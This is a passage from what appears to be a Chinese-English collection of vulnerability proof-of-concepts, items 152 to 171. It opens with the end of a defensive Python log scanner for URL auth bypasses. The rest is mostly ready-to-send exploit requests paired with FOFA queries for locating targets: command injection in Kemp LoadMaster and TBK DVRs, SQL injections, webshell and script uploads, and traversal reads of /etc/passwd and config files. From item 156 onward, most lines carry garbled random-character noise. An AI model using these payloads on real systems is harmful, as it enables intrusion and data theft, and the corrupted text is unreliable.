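10.0.0.6 - - [01/Mar/2024:10:00:03 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 300
10.0.0.6 - - [01/Mar/2024:10:00:04 +0000] "GET /;swagger-ui/dataSource/pageList?pageNumber=1 HTTP/1.1" 200 900
10.0.0.7 - - [01/Mar/2024:10:00:05 +0000] "GET /swagger-ui/index.html HTTP/1.1" 200 4000
10.0.0.8 - - [01/Mar/2024:10:00:06 +0000] "GET /app/rest/server HTTP/1.1" 401 120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Names AJ-Report's auth filter lets through without a session; the bypass
# smuggles one of them into a protected URL behind a ';'.
PUBLIC_MARKERS = ("swagger-ui",)


def parse_query(query: str) -> dict:
    """Minimal key->value split that keeps ';' inside values intact (older
    parse_qs versions treat ';' as a separator and would hide the payload)."""
    out = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[key] = value
    return out


def classify(target: str):
    """Return the reasons a request target matches one of the bypass shapes
    (empty list when it looks benign)."""
    parts = urlsplit(target)
    path, query = parts.path, parse_query(parts.query)
    reasons = []
    # Servlet path parameters: ';x' is dropped before routing but is still
    # there when a naive prefix-based auth filter inspects the URL.
    if ";" in path:
        reasons.append("path parameter in URL path")
        tail = path.split(";", 1)[1]
        for marker in PUBLIC_MARKERS:
            if marker in tail:
                reasons.append(f"public marker '{marker}' smuggled after ';'")
    # TeamCity CVE-2024-27198: any 404 path plus a jsp= parameter that names
    # an internal endpoint and ends in ';.jsp'.
    jsp = query.get("jsp", "")
    if jsp.startswith("/app/rest") or jsp.endswith(";.jsp"):
        reasons.append("jsp= parameter redirecting into an internal endpoint")
    # TeamCity CVE-2024-27199: dot segments climbing out of an
    # unauthenticated prefix such as /res or /.well-known.
    if "/../" in path + "/":
        reasons.append("dot-segment traversal in path")
    return reasons


def scan_log(text: str):
    """Return (target, reasons) for every suspicious request in a log."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            reasons = classify(match.group("target"))
            if reasons:
                findings.append((match.group("target"), reasons))
    return findings


if __name__ == "__main__":
    for target, reasons in scan_log(SAMPLE_LOG):
        print(target, "->", "; ".join(reasons))
```

The same rule applies in a WAF or reverse proxy: reject, or at least log, any path containing ";" or a dot segment before it reaches the application, because the application's own filter is exactly the component that has been shown not to see them.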
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the injected command sits in the Basic-auth username.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the copied file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the file path returned in the response, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 操作系统命令注入# ?! T6 Q4 C( @2 f' m# c- w
CVE-2024-3721
/ y% W) X2 D6 u6 v" [7 rFOFA:"Location: /login.rsp"
. J7 o$ n) A( z6 w& G; O( @3 n·TBK DVR-4104
: E- _! T0 o: l·TBK DVR-4216
9 E! u' T$ p' a; @2 ncurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1". F  v- u4 U9 J4 k
+ k' h/ n; K  A- y

( I3 x3 B% K. Y* P, JPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, \2 {5 O) b6 s+ z- T1 ~Host: x.x.x.x
, @+ s( c7 ]+ B. ~/ [" U% S  i& J9 tUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 W$ G5 u6 z, X. U% t
Connection: close
  ]  [; f% s3 c; T7 PContent-Length: 0
" c# l9 q9 P" N9 \* h+ o3 GCookie: uid=17 m- z: x; p6 r3 Y9 n- ?# Z8 m
Accept-Encoding: gzip
3 v1 G; ?& l" c8 a7 k8 P+ L) A  _4 [2 M, z

6 `# o; E! ~) `" R0 ?$ d157. 美特CRM upload.jsp 任意文件上传! I- h# |0 V7 q* ?; ?
CNVD-2023-069715 W, f# C* `) E! F
FOFA:body="/common/scripts/basic.js"7 \! I# ?0 t. x0 M" h2 Q3 C$ H
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* i# _3 A. r7 J" HHost: x.x.x.x3 U  m1 p' h. F# W+ i. g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" A! \" _8 u# j. E+ l
Content-Length: 709
+ E  G0 k. H; Z, Y1 M/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ ?' s3 S5 A6 Y4 U
Accept-Encoding: gzip, deflate8 _' |4 K( C" a6 O0 q
Accept-Language: zh-CN,zh;q=0.9
6 T! a( F/ }: ~* b6 |5 ZCache-Control: max-age=0
/ I! e4 A4 E- n" C  GConnection: close
" H1 |+ _; v7 d9 c# h& hContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN( W: Z: t7 b9 m
Upgrade-Insecure-Requests: 1
  r& j( U$ W& x, q
3 s% C# h( c, V7 V------WebKitFormBoundary1imovELzPsfzp5dN
/ N  h! f+ V9 l9 q- _6 vContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
8 A. D: C' g' ^Content-Type: application/octet-stream% p5 H' D6 C+ I/ I0 q+ G
& Y5 D1 V" w! W3 |4 Z) T# @3 T
nyhelxrutzwhrsvsrafb
9 \& g" D$ {# c- f; d; D" ~2 m------WebKitFormBoundary1imovELzPsfzp5dN
1 M# W7 `9 l9 E: m* R+ f* K( [$ U- qContent-Disposition: form-data; name="key"
2 C7 _7 o. H7 A* O# s7 D
) R* m3 a! t6 V0 dnull
3 v6 g+ Z" Y8 D; j$ J4 g------WebKitFormBoundary1imovELzPsfzp5dN' ]8 h6 T  x4 g2 G, q( H
Content-Disposition: form-data; name="form"
2 T. |  [5 e% u4 p* X$ m4 f/ ]( n! Q0 w5 f" m
null
) g0 N2 W# T. t9 [) F  P------WebKitFormBoundary1imovELzPsfzp5dN
3 N1 V2 X" ?- J" ]Content-Disposition: form-data; name="field"8 a5 l- t/ H  |

6 l! q6 v7 O/ J3 ^3 \null
- d6 G, l3 \. u  |& p------WebKitFormBoundary1imovELzPsfzp5dN- ~& C& g4 K5 ~
Content-Disposition: form-data; name="filetitile"
: l& H4 x& d) n; h+ P- ]# l8 z# v& N0 q! j/ u
null
1 p  e0 Q  U' ?2 z* d------WebKitFormBoundary1imovELzPsfzp5dN# Q" @* C  L( d0 h/ z
Content-Disposition: form-data; name="filefolder"
, J6 u7 J2 [- o4 }/ d8 j" I: r% @4 G& E' K% W# b2 q
null  J9 s0 M' ~: L6 b$ t$ t/ _
------WebKitFormBoundary1imovELzPsfzp5dN--
+ h; k: A' Q9 v; W; v
) R( Q1 F  w5 g$ C/ a' i( B0 q
. Q6 h, t( u" a2 I1 _$ r7 Jhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp9 R" I, D2 T; `/ K' Z% {. B
* `0 c7 }4 \0 Q7 k3 K" J  }' K- k4 _
158. Mura-CMS-processAsyncObject存在SQL注入
" G2 L1 [: R; ~% L, r9 UCVE-2024-32640
  @- f4 Y- i0 A3 |* I! JFOFA:"Generator: Masa CMS"
+ s" d3 u% c/ S$ t, d; _! [POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( c( v8 K+ j+ fHost: {{Hostname}}- _2 q, L- _$ F+ f
Content-Type: application/x-www-form-urlencoded$ m7 s  ~9 a$ e% |
, }% y  d. \4 s* n! X$ C0 S+ z
object=displayregion&contenthistid=x\'&previewid=1
% g5 w- w- Z3 u. G3 x# Y5 H" ]/ m* B: X" z

1 L$ i7 B- ?  Q& _$ f159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传# z8 D' @' v3 v' r2 W; [
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
; p. |) b" f# o) pPOST /webservices/WebJobUpload.asmx HTTP/1.1
$ @0 Y- }' x. C: R3 ^% V" F' OHost: x.x.x.x) i; s0 {4 w+ Q2 [. k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36* @+ f+ Q, s+ i: X% C
Content-Length: 1080* @  T$ X3 P  e- [- G4 u7 G2 K
Accept-Encoding: gzip, deflate
# `" B4 ?) {: ~8 e* a; ]$ TConnection: close
% f% [+ G) J+ d2 b, n) J3 r7 F5 TContent-Type: text/xml; charset=utf-8
7 E& J5 m5 z4 V% \* L/ pSoapaction: "http://rainier/jobUpload"  x# w' A8 \- t9 Z- Q& N
, D# i  V& F: d) A( h
<?xml version="1.0" encoding="utf-8"?>
' X; U* S1 l% L2 X<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ w7 {. I: l4 _  Z6 u& C5 d. u<soap:Body>
) V3 }- z5 x' C4 P- g( u- u<jobUpload xmlns="http://rainier">$ i$ }: ~  c, q, f& T
<vcode>1</vcode>4 y+ h( X* }( S3 R: B( ~& k
<subFolder></subFolder>3 i+ A1 ^8 f/ u/ v% q# J
<fileName>abcrce.asmx</fileName>9 k. |6 J! H2 ~7 M- \
<bufValue>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</bufValue>
4 n' {4 t+ O" _; B( W" h</jobUpload>6 M9 x% x6 A- ~5 k8 Z
</soap:Body>7 K+ G6 C% E- R3 W+ R4 }& V
</soap:Envelope>! f$ e: m  F; G2 N# _. L' {- E

8 g' `6 k0 a0 a8 E& o' P
% W- j/ L8 {4 J/ q( e3 L/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
0 w( I9 C1 f, @9 P4 s8 j
& s: W- T; T5 J* n( s" m% [6 j
160. Sonatype Nexus Repository 3目录遍历与文件读取
* A4 @7 [/ @" fCVE-2024-4956+ x2 @$ ?6 t' K; B: F  ]1 g! k3 U
FOFA:title="Nexus Repository Manager"
) t* ~- _2 ~5 ]' D9 _# k8 K- @GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1. [" V& F6 c7 _
Host: x.x.x.x
) y$ n: c8 B- M; oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
2 K( U3 H6 b5 X/ Q) p5 f  {Connection: close
' s- F% I! X: H2 f9 D7 dAccept: */*! K5 y9 c4 }8 m; y) Y
Accept-Language: en/ i! G( H  b  {$ x8 i1 Q8 x
Accept-Encoding: gzip
# s9 C7 W  e: t; y, T' z
& Z; s4 ?5 B# F0 J  S
8 M3 {7 w, `. ~: M6 D* \) r6 N161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传  h/ {" ]( c. W" |# W: Q0 _: `0 l
FOFA:body="/KT_Css/qd_defaul.css"
2 W' f9 h5 B7 i/ k: X8 R- X3 P+ q第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
) y( @& R/ o, ^9 |1 m. HPOST /Webservice.asmx HTTP/1.1
2 W' G# k- G7 w( r" LHost: x.x.x.x0 b- n- F6 f, U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% s, q! L& V' C3 P
Connection: close
* N, Q& d# i7 Y# A  k% ~Content-Length: 445/ d  |9 }7 ?! d( y1 m' B8 x1 H
Content-Type: text/xml
, N) J$ n) S! o% O, F: BAccept-Encoding: gzip- r6 z' L% h- P

. d. x8 h4 Q, N; P1 n. i) ^. I<?xml version="1.0" encoding="utf-8"?>& S+ N" o1 m, A5 Q2 o& X# l
<soap:Envelope xmlns:xsi="8 h5 X' Y3 M2 G% B# ~8 d
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema": S! M- N$ Z& x/ M8 |5 E
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; q$ t- o. H7 \. E5 }& ~<soap:Body>
' l0 ]/ Y  _" L<UploadResume xmlns="http://tempuri.org/">) f& N' t0 i; P6 \
<ip>1</ip>
, u+ ?0 D% z" h+ Q2 q: n<fileName>../../../../dizxdell.aspx</fileName>
! a& f7 k0 H, t6 k$ T- N$ z: H<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
: Z6 _: ?+ G1 g# c6 q& d" E<tag>3</tag>
6 m! }! F. \( z8 T</UploadResume>
5 l: L! i8 \2 q( C5 _5 @3 [</soap:Body>' c& e0 w; G9 P0 ]! z. l
</soap:Envelope>4 p& Z' |" E0 H3 g3 Q
" r" B- c  w; U5 q$ v

4 L. T7 @1 E! l) Y6 m( Thttp://x.x.x.x/dizxdell.aspx. u% [  c( `! q$ Y$ z$ b
% V% K. {7 ^5 z2 E% ^
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 b, l4 i0 h. Z  l1 ]* @; G
FOFA: app="和丰山海-数字标牌"
- q5 b& L6 @5 u+ \$ v& zPOST /QH.aspx HTTP/1.16 u7 p% Q0 o% A- z
Host: x.x.x.x; b, L+ w% N! m5 h- y7 r+ u2 C, P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
9 \6 {! w5 f6 ^4 @Connection: close  H6 ]% X& B  ]. c
Content-Length: 583$ d, p  @* Z' O; |" U' L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey4 H" M+ T; @% m
Accept-Encoding: gzip
0 @+ |8 z' @3 r# V* R4 M: r' k
. I, [0 S8 ]) b% c# }------WebKitFormBoundaryeegvclmyurlotuey( R3 g5 T- S) A* [  J; K
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 T% f2 ]2 S2 |* t. B
Content-Type: application/octet-stream4 }0 m7 F9 u4 q) T8 j# F
- y3 B9 ^' q3 m. J
<% response.write("ujidwqfuuqjalgkvrpqy") %>4 ~3 r4 D' Q5 A) L3 F, V; N! P
------WebKitFormBoundaryeegvclmyurlotuey1 G8 @# w, @3 [
Content-Disposition: form-data; name="action"( S5 g/ N% e. N1 d
4 T) X7 |+ }) M! L1 W& y0 U& p
upload( p; s/ g: L3 |
------WebKitFormBoundaryeegvclmyurlotuey
4 |, d! C3 Y, S, ^: b( q" RContent-Disposition: form-data; name="responderId"9 V( R4 R$ ?. A$ R/ r& P9 I
* y- S  P. m; u
ResourceNewResponder
" s( B$ `% }* e/ C------WebKitFormBoundaryeegvclmyurlotuey  m3 E+ e8 O! w* k1 ~
Content-Disposition: form-data; name="remotePath"( R+ D6 C- Z0 T

" d, `! b+ g( Y) q* z/opt/resources1 R% E9 Q0 {: W1 z
------WebKitFormBoundaryeegvclmyurlotuey--
  S5 A. l6 T' {6 m6 \. Q( c& e- N
$ w% p6 I/ B' K6 X) w. Q  z; N$ p4 h9 ?% }& Y" c: b0 l/ C2 X) U
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
7 m/ x2 {" ?# c; i1 u5 g
% t' W. S3 J, r7 o2 q163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
+ p4 y5 P; |/ e5 I# Y, ]8 I1 l! VFOFA: icon_hash="-795291075"' W4 C6 L( I% V7 r
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1" `, h0 p, n+ a8 \3 M, u
Host: x.x.x.x
. i# V8 j- b5 B$ d! s9 z! TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
  v4 U  j  Z& Q' i  p" J# YConnection: close
: m: E$ Y2 _' Y& N( IContent-Length: 293
3 s# F% D2 i1 s' a4 f7 e  d9 ]' lAccept: */*2 Z% T9 O9 S7 @3 n# ~& `0 a
Accept-Encoding: gzip, deflate
! r' M: Q5 S; A  g4 C& qAccept-Language: zh-CN,zh;q=0.9
' t7 f; ]4 N/ ?$ J' ~Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod3 _: b% g; ^: v  ^- T
/ f; P9 ]7 D0 u2 Q
------iiqvnofupvhdyrcoqyuujyetjvqgocod
& T8 T( e3 [1 |2 I0 a7 p4 f6 F4 ZContent-Disposition: form-data; name="name"
. z" S0 d1 X1 _2 y$ V% M( C
7 k. O+ H. j: }  z( a( |1.php0 n6 l& ^3 _5 H; p. J' y* p
------iiqvnofupvhdyrcoqyuujyetjvqgocod" Z3 j) w1 M% l* r$ }, G2 o8 z6 `
Content-Disposition: form-data; name="upfile"; filename="1.php"' }2 b4 s- ?% M4 @7 N
Content-Type: image/jpeg% v& C& Z( Z9 G; ]
  @0 G- _6 T6 O2 G7 N
rvjhvbhwwuooyiioxega9 O% e: [* x$ d. L
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: ]% ?! K$ [1 t: e$ u3 k8 n; t; P* e5 ?" w' Q1 |' H

& B$ Y. d; m3 I( v9 w164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
+ C. K6 P+ U  }9 W  ~/ eFOFA: title="智慧综合管理平台登入"
3 i) B$ S9 h% V$ ePOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1! A! V  u4 r  K7 ^: u
Host: x.x.x.x/ T% r) }3 l! H) k, ^- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- v/ @* G, I0 |: _' z9 S) FContent-Length: 288
( o, Z" h* ^' e4 cAccept: application/json, text/javascript, */*; q=0.01
+ u; `5 C% v4 ^" z( u; F0 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,, t/ L9 e$ U7 H+ a
Connection: close7 l  N( A( h- L) p; v5 y1 B6 Z5 W
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl1 V2 t5 B% c7 f
X-Requested-With: XMLHttpRequest/ w# q( y% h- a  g
Accept-Encoding: gzip
% [' h8 \( \/ N+ o! k, ?! l5 d( _) H/ W& s
------dqdaieopnozbkapjacdbdthlvtlyl" M" g0 ?+ e, X6 D
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ o2 N+ ?) X; O3 J  I9 E
Content-Type: image/jpeg- {. O( J( Y' X2 s) j2 R9 l
6 `% P/ A% d/ F3 b7 l' q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
! n; F: ~$ }! |: D/ `/ W4 T; l------dqdaieopnozbkapjacdbdthlvtlyl--
; J# M6 B' {' h+ O0 C) X7 M, y( N, R. l5 z6 V
4 z  H% c8 e  H! C' k3 r+ l$ X4 y
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
/ J) R/ M& g9 x/ N
7 w$ |" N6 `, Z! ]2 {: d' e165. OrangeHRM 3.3.3 SQL 注入
! G: D4 `- T2 ~CVE-2024-36428
# R9 ^  t. S0 |% O, O- g+ mFOFA: app="OrangeHRM-产品"4 v5 L% H* r# F; Q
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
8 b% ^7 v# b8 f: X3 H3 _% t
! c* C' S% C0 L9 P* j7 E  t- }# g& H$ ^5 ~- M4 H
166. 中成科信票务管理平台SeatMapHandler SQL注入
' d; v  S' i  C- X( PFOFA:body="技术支持:北京中成科信科技发展有限公司"
; y( T% c3 \7 d; xPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
( E7 v2 U! s! S6 WHost:( B8 j# x% ?3 S& Y
Pragma: no-cache
  u2 N) K: g& w/ u$ W5 nCache-Control: no-cache
5 l& o3 z' S& l# N* c  MUpgrade-Insecure-Requests: 1, U: y7 Z/ b2 M2 b5 Y' T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
. H  `! x. B4 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! n& e+ D6 m) `8 L" m) d  ]! T
Accept-Encoding: gzip, deflate& O$ P$ R; f; {$ S9 r% m+ _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 k8 n* ]6 P0 E: _Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
  c  {7 B2 N1 U' aConnection: close1 f1 }9 `. j0 \: Y* S
Content-Type: application/x-www-form-urlencoded
6 v9 N# w) O) N" t0 F, s4 AContent-Length: 89
: J9 y. a  z! |/ v
, b6 n5 z- X6 }, }! K0 |! _Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
- q6 f7 _9 r' w* g; y  a! e; p9 _# L$ Z$ v4 C8 d; a% J; x! I

4 u. G% r) q: H167. 精益价值管理系统 DownLoad.aspx任意文件读取
% r+ U/ v8 y6 x' m# A; H0 U$ aFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"& d: s+ x, C6 F! C
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! h( a/ d. H, U2 x& K! L* F1 r) mHost:" I' K6 x& V1 Y! B6 M( q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 U7 K* x* t) V6 f+ C: oContent-Type: application/x-www-form-urlencoded
& |/ _5 {5 [" @5 U; t  G/ cAccept-Encoding: gzip, deflate5 u) Q8 z* W' q; ]+ A8 x
Accept: */*
. d. y+ F5 j2 y' }( jConnection: keep-alive
6 E* K8 D5 x$ P0 I. D1 E5 F$ }9 ~2 Z% x! V- p# @' y: g* B/ d
: ~) j; S  r* A8 k: L
168. 宏景EHR OutputCode 任意文件读取
  {+ P) b1 M; K9 Z7 TFOFA:app="HJSOFT-HCM"" J) g0 i) _% f6 d" P+ O3 w
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1; A2 Y: |5 M+ u. C
Host: your-ip
4 k6 q- h6 T2 r. E- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ |! u, i# r3 \6 fContent-Type: application/x-www-form-urlencoded
9 n  V9 O! B/ u& u% JConnection: close$ w# O4 ?1 m$ E+ w
) _+ S- T! I; _% C
1 R6 E% ^8 f  L/ ?
' {% U* @1 ^; e' G, `7 k) a
169. 宏景EHR downlawbase SQL注入
- Q0 y2 K/ b# v0 e8 kFOFA:app="HJSOFT-HCM"" b7 {) f& W+ R2 a# _
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* c; g0 u7 t5 g( c0 z
Host: your-ip
5 g. f: g6 S& ?, m6 F" N; N& p) y5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# s" O! o$ Y3 Y% B7 q
Accept: */*, j; l  ~- m: d6 w% _
Accept-Encoding: gzip, deflate& m0 G& [+ E" y. q$ e8 W
Connection: close2 b9 i8 Q4 U2 j1 @( ]5 {; p

3 R! z; z6 [4 `5 K6 q; d# N/ v  A/ D7 Q. e: V3 N

2 N( s& t8 f/ P" s3 F170. 宏景EHR DisplayExcelCustomReport 任意文件读取; J% G: @' c# j) x
FOFA:body="/general/sys/hjaxmanage.js"9 f& Y4 j% L0 d7 J, z
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 d1 a9 Y& [* V# I. _( MHost: balalanengliang
' _" o' [+ M/ ?$ g/ E! aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ]' l% h- W5 e
Content-Type: application/x-www-form-urlencoded
! M4 [& [7 ?- u  K% R% L* C! S5 C, n2 p3 {
filename=../webapps/ROOT/WEB-INF/web.xml3 u0 M! I& a+ ?1 k, |6 v

+ G6 w/ V% l1 x; J3 y' B# ~4 |
  r& [) t! l3 l( i: P% W' g3 ?; ^% d+ z171. 通天星CMSV6车载定位监控平台 SQL注入! {/ ?  o# J0 d* K3 h3 [3 @3 g% C
FOFA:body="/808gps/"
1 Y& ]$ C, p# @: s( \$ pGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1! L; h6 v- U' s2 k
Host: your-ip9 |" A: X3 i3 R+ ~% H& N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! h2 Y% z; T0 `4 w4 Z
Accept: */*  ^, N' U- ]/ ?5 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ _" d# f, B; D4 V) a1 t2 d
Accept-Encoding: gzip, deflate7 Y( R, Y! J+ V
Connection: close$ c# P7 n4 _2 x# F1 j
) q( g% g  p1 O# u
2 i/ x( k( V: U% w4 d# h2 C6 s
9 o5 W3 l* k3 P- ?: ]* c+ y
